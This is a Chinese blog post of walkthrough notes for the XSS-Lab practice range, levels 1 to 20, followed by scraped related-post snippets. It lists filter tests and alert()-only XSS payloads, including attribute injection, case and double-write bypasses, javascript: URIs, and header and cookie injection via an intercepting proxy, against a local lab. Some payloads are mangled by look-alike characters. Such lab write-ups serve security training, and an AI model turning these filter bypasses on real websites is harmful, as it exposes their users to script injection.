XSS-Lab 1-20关 通关笔记

最新推荐文章于 2024-04-27 05:56:37 发布
最新推荐文章于 2024-04-27 05:56:37 发布
阅读量360 收藏
点赞数
文章标签: xss 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/fffhhdd/article/details/131621791
版权

XSS-Lab 1-20关 通关笔记

第一关:
第二关:

测试 script " ’ Oonn

得到 script " ’ Oonn 无过滤

value 属性 -> " οnmοuseοver=“alert(/xss/)”

第三关:

测试 script " ’ Oonn

得到 script "’ Oonn 过滤 "

Value 属性 单引号

’ οnmοuseοver=‘alert(/xss/)’

第四关:

测试 script " ’ Oonn

得到 script " ’ Oonn 无过滤

value属性 双引号

" οnmοuseοver=“alert(/xss/)”

第五关:

测试 script " ’ Oonn

得到 script " 'oo_nn 过滤 on

value属性 双引号

">click

第六关:

测试 script " ’ Oonn

得到 script " 'Oo_nn 过滤 on

value属性 双引号

">click

发现过滤href属性

大写绕过:

">click

第七关:

测试 script " ’ Oonn

得到 " 'on 过滤 script,On

value属性 双引号

">click

大写无法绕开

双写on绕过:

" Oonnmouseover=“alert(/xss/)”

第八关:

测试 script " ’ Oonn

得到 script "’ oonn 过滤双引号

value属性 双引号

发现下面href属性

javascript:alert(/xss/)

发现过滤script大写无法绕过

unicode编码绕过

javasCRipt:alert(/xss/)

第九关:

测试 script " ’ Oonn

得到 script "’ oonn 过滤双引号

value属性 双引号

同第八关href属性 值为:

您的链接不合法?有没有!

改为合法链接

javascript:alert(‘http://www.baidu.com’)

第十关:

无input框

源代码发现三个隐藏input

URL传参发现t_sort可传参改变value,

测试发现过滤 < >

" type=“text” οnmοuseοver="alert(/xss/)

第十一关:

无input框

源代码发现四个隐藏input

URL传参发现t_sort可传参改变value,

" type=“text” οnmοuseοver="alert(/xss/)

发现 " 被过滤

从其中发现t_ref隐藏字段value为上一个页面地址

即请求头 referer 字段

BP抓包修改referer为

" type=“text” οnmοuseοver="alert(/xss/)

第十二关:

无input框

源代码发现四个隐藏input

URL传参发现t_sort可传参改变value,

" type=“text” οnmοuseοver="alert(/xss/)

发现 " 被过滤

源代码发现t_ua为请求头中User_agent的内容

BP抓包修改" type=“text” οnmοuseοver="alert(/xss/)

第十三关:

无input框

同上关,“ 被过滤,

抓包发现cookie参数传入t_cook,抓包修改cookie

" type=“text” οnmοuseοver="alert(/xss/)

第十四关:

文件失效 无法测试

第十五关:

无input框

传参测试发现span标签可获得参数

双引号 被过滤

破局知识点:

1、ng-include 指令用于包含外部的 HTML文件

2、包含的内容将作为指定元素的子节点。

3、ng-include 属性的值可以是一个表达式,返回一个文件名。

4、默认情况下,包含的文件需要包含在同一个域名下。

尝试传入第一关的地址URL

'http://localhost/xsslabs/level1.php?name=alert(/xss/)

发现 " < > 均被过滤 出现level1的页面但没有弹框

构造img标签后发现可以显示,利用onerror事件

'[**http://localhost/xsslabs/level1.php?name= src=aaa οnerrοr=alert(/xss/) />’

第十六关:

无input框

keyword可以传参到center标签内

测试发现 空格 script / 均被过滤

破局知识点:

1、%0D%0A 回车编码 用来代替空格

payload:

<a%0D%0Aοnclick=alert(1)>123

第十七关:

无input框

过滤 “ < >

无法构造script arg0 与arg1 可以传参 格式为 arg0=arg1

arg01=1&arg02=1 οnmοuseοver=alert(1)

第十八关:

无input框

查看源代码仍未arg01与arg02 传参 格式为arg01=arg02

**arg01=1&arg02=1 οnmοuseοver=alert(1) 同17关 **

第十九关:

无input框

第二十关:

无input框

PuPPET ER
关注
详细xss labs二十 新手攻略,内含总结(保姆级教程,看了必会)
qq_40820713的博客
05-11 1825
Xss labs 靶场二十
xss-labs靶场:level15攻略 页面中html引用法
godfish44的博客
09-17 311
经过不懈努力,我们成功通过了前面12,需要注意的是,十三的技巧与十一和十二大同小异,只是将注入的位置改为cookie即可,而第十四页面中内嵌的网页已经无法访问了,我们直接跳过,接下来我们一起看第十五。函数可以理解为文件包含的作用,它可以直接引用同一域名下的html页面,通俗点来说,就是在页面中导入另一个页面,它是基于AngularJS框架的。弄清楚了这一点,我们只需要把aaaaa替换为另一个网页的html文件,就可以显示出该网页并利用该网页的漏洞成功执行代码,弹出警告框。
xss-labs-test1-test20
qq_45751902的博客
04-15 1455
简述 跨站脚本(Cross-site scripting,简称为:CSS, 但这会与层叠样式表(Cascading Style Sheets,CSS)的缩写混淆。因此,跨站脚本攻击缩写为XSS)是一种网站应用程序的安全漏洞攻击。 XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、 LiveScript、ActiveX、 Flash 或者甚
xss-labs 10到20
h0ld1rs的博客
07-23 956
xss-labs 11--201112131415161718192011 在网页中查看源代码并没有获得有效信息 于是我选择查看php源代码 发现这一多出来这个,但这个又被str_replace函数处理 而HTTP_REFERER是获取http请求头中的Referer字段, 就是我们上一级网页的url, 那么我们就需要使用到抓包工具进行抓包,修改Referer字段。 但是好几次,我抓包的时候都没有refer这个选项 最后找到的方法是,在第十转换到第十
XSS-labs Level 20 Flash XSS
baynk的博客
11-24 3089
level 20 Flash XSS 一片空白的flash,上一的思路的没有了,只有来审计代码了。。。 package { import flash.display.LoaderInfo; import flash.display.Sprite; import flash.display.StageScaleMode; import flash.events.Event;...
XSS lab_20
qq_45951598的博客
10-20 559
项目地址:https://github.com/myxss/vulstudy/tree/master/XSS-challenge-tour 第一 这里先传一个1,看一下回显位置 这里可以看到在h2的位置有回显。 所以我们可不可以把h2闭合,在后面执行一条语句呢! 可以看到我们这里已经闭合了h2,12溢出来了 所以这里我们可以用js脚本去执行,这样就完成了 第二 这里输入一个test 这里发现有两个回显的位置,这里我们先测试下面的回显位置。 这里传入参数test">123,可以看到123
xss-labs通关攻略教程(level1~level 10)
2401_84446787的博客
04-27 720
level 2——闭合标签观察页面提示,发现依然为反射型xss,但是与上一不同之处在于有了搜索框。尝试添加与上一相同的参数查看源码,发现和被HTML字符实体化为被HTML字符实体化为猜测在服务器端对keyword这个参数使用了函数,但是value参数中的值未被恶意编码,其中输入的payload被赋值给value,可以考虑闭合value的参数值。">//level 3——单引号闭合并添加事件尝试提交一个随便的参数,查看url中是否有提示输入构造的弹窗测试语句。
xss-labs通关记 level1~8
qq_35258210的博客
01-08 898
"""本人网安小白,此贴仅作为记录我个人测试的思路、总结以便后期复习;今后本着少就是多,慢就是快的方式一步一个脚印进行学习,把这个知识点学扎实了,再学另外一个知识点。费曼教授是不是曾经说过以教代学是最好的学习方式?有很多错点可圈可指,所以也请dalao指出不对的地方,所谓教他人的时候也是在稳固自身""" 未做严格排版,后面有时间了再来整理整理 目录 level1 level2 level3 level4 level5 level6 level7 level8 level1 1、寻找插
xss-labs靶场学习笔记
qq_46117757的博客
07-22 168
level1 直接在url写入js语句 level2 keyword后面或文本框输入 ">闭合value属性 123"><script>alert(1);</script> level3 查看源代码 value属性使用单引号 在输入框输入以下代码 ,提交后鼠标移到输入框完成。 123' onmouseenter='alert(1); <!--即整个标签为--> <input name=keyword ...
XSSxss-labs-level15
Hugu
02-24 880
文章目录0x01 XSS-Labs0x02 实验工具0x03 实验环境0x04 实验步骤0x05 实验分析0x06 参考链接 0x01 XSS-Labs   XSS(跨站脚本攻击)是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。   XSS按照利用方式主要分为:反射型XSS、存储型XSS、DOM型XSS。反射型XSS是攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的
XSS20练习源码
09-04
包含20XSS练习的源码。文件都为PHP类型,下载个phpstudy就可以搭建起来了。我已经通过了,所以共享出来给大家练习。
XSS挑战之旅[全20]上
ldkpolite007的博客
05-06 2727
Contents 0x01 0x02 0x03 0x04 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语法知识。 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客: 全新的界面设计 ,将会带来全新的写作体验; 在创作中心设置你喜爱的代码高亮样式,Markdown 将代码片显示选择的高亮样式
XSS-labs1-20通过手册
rumil的博客
09-21 2945
ng-include指令一般用于包含外部HTML文件,ng-include属性的值可以是一个表达式,返回一个文件名,但是默认情况下,包含的文件需要包含在同一域名下,也就是要调用同一域名下的其他网页。通过代码发现,本卡有两个参数:arg01、arg02,当我们发送的时候,发现他们是会互相拼接起来的,那么我们就容易想到这里会不会就是突破口,发现这两个参数是在embed上,embed标签定义嵌入的内容,并且做了尖括号过滤,那么我们可以加入一个属性进去,生成恶意代码。被HTML实体编码了,成了实体字符。
xss1-20
故事讲予风听
06-10 834
XSS(Cross-Site Scripting)是一种常见的Web攻击技术,攻击者通过注入恶意代码,使得在用户访问受到攻击的网站时执行并影响用户的浏览器。XSS攻击通常被用于盗取用户信息、会话劫持、篡改网站内容等非法目的。
xss-labs(level10~20)
qq_39670065的博客
07-25 829
level-10 画风突变,发现并没有输入框 查看源码 会发现<input>之中有三个t_link、t_history、t_sort标签 还是使用<script>alert('xss')</script>进行尝试 会发现<和>均被编码 师傅们的思路是: 因为有三个<input>标签,里面有三个参数,所以尝试从这里入手,构造 <script>alert('xss')</script>&t_link=" type="te
XSS-通关小游戏(1-20
热门推荐
→_→
05-28 1万+
在玩游戏之前先简单的了解下,什么是XSS1.什么是xss XSS攻击全称跨站脚本攻击,是为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSSXSS是一种在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。 2.xss原理 (1).攻击者对某含有漏洞的服务器发起XSS攻击(注入JS代码) (2)诱使受害者打开受到攻击的服务器URL(邮件、留言等,此步骤可选项) (3)受害者在Web浏览
跨站脚本攻击xss-labs(1-20)靶机练手
duoba_an的博客
03-03 2120
XSS又叫CSS(Cross Site Script)跨站脚本攻击,是指恶意攻击者往web页面中插入恶意代码,当用户浏览该网页时,嵌入其中的恶意代码会被执行,从而达到恶意的特殊目的。XSS属于被动式的攻击。XSS最大的特点就是能注入恶意的HTML/JavaScript代码到用户浏览的网页上,从而达到劫持用户会话的目的。由于HTML代码和客户端JavaScript脚本能在受害者主机上的浏览器任意执行,这样等同于完全控制了Web客户端的逻辑,在这个基础上,黑客或攻击者可以轻易地发动各种各样的攻击。
xsslab记录(11~20
m0_56375711的博客
12-08 259
xsslab11~20(白盒测试)
XSS-labs靶场通关秘籍(level 17-20)
qq_45741871的博客
09-24 830
xss-labs靶场通关秘籍
xss-lab 通关实战
最新发布
01-02
### 富文本XSS漏洞的实战解决方案 #### 了解富文本XSS漏洞的本质 富文本XSS漏洞是Web应用程序中最难防御的一类跨站脚本攻击形式之一。当应用允许用户输入HTML内容而不加严格控制时,恶意用户可以注入JavaScript代码来执行各种有害操作[^1]。 #### 防御策略概述 为了有效应对这种类型的威胁,采用白名单过滤机制成为不可或缺的选择。该方法只允许特定的安全标签及其属性通过,从而阻止任何潜在危险的内容进入系统。此外,遵循安全开发生命周期中的最佳实践对于构建稳固防线至重要。 #### 实施具体措施 - **输入验证**:确保所有来自用户的HTML输入都经过严格的语法和结构检查。 - **编码输出**:在显示之前对特殊字符进行转义处理,防止它们被浏览器解释成可执行代码片段。 - **使用库工具**:借助成熟的第三方组件如DOMPurify可以帮助简化这一过程并提高效率。 - **定期测试**:持续开展渗透测试活动以发现新的风险点,并及时调整防护手段。 ```javascript // 使用 DOMPurify 净化 HTML 输入示例 const dirtyHtml = '<img src="x" onerror="alert(1)">'; // 假设这是未经净化的数据 const cleanHtml = DOMPurify.sanitize(dirtyHtml); console.log(cleanHtml); // 输出:<img src="x"> ``` #### 参考案例研究 Mall4J是一个实际运用了上述原则的成功范例。该项目不仅实现了前后端分离架构下的全面功能支持,还特别加强了针对XSS攻击的有效预防措施,在源码层面提供了良好的示范作用[^2]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值